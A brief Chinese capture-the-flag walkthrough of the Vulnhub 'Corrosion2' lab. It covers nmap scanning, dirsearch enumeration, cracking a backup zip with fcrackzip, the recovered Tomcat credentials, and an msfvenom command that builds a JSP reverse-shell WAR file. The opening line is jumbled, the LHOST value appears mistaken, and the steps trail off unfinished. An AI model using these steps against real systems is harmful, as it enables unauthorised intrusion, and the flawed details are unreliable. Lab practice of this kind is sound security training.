Vulnhub----Corrosion2靶场
密码是@administrator_hi5。发现了两个可能有用的信息,分别访问。kaili和靶机都设为NAT模式。4.解压backup.zip。1.用kali作为攻击机。发现可以部署war文件。
·
1.用kali作为攻击机
查找靶机的ip
kaili和靶机都设为NAT模式
nmap -sn 192.168.51.0/24
2.扫描端口
nmap -p- 192.168.51.130

3.访问端口
80

8080

3.扫目录
dirsearch -u http://192.168.51.130

没用
dirsearch -u http://192.168.51.130:8080

发现了两个可能有用的信息,分别访问
readme.txt

backup.zip

4.解压backup.zip

需要密码,破解一下
fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u backup.zip


密码是@administrator_hi5

cat tomcat-users.xml

username="manager" password="melehifokivai"
username="admin" password="melehifokivai"
5.登录

发现可以部署war文件
6.制作war文件
msfvenom -p java/jsp_shell_reverse_tcp LHOST="192.168.51.130" LPORT=8888 -f war > jsp_java.war

7.访问

8.开启监听


更多推荐
所有评论(0)